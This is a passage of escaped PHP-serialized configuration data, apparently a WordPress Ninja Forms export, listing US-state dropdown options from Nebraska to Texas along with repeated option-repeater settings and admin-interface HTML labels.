Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 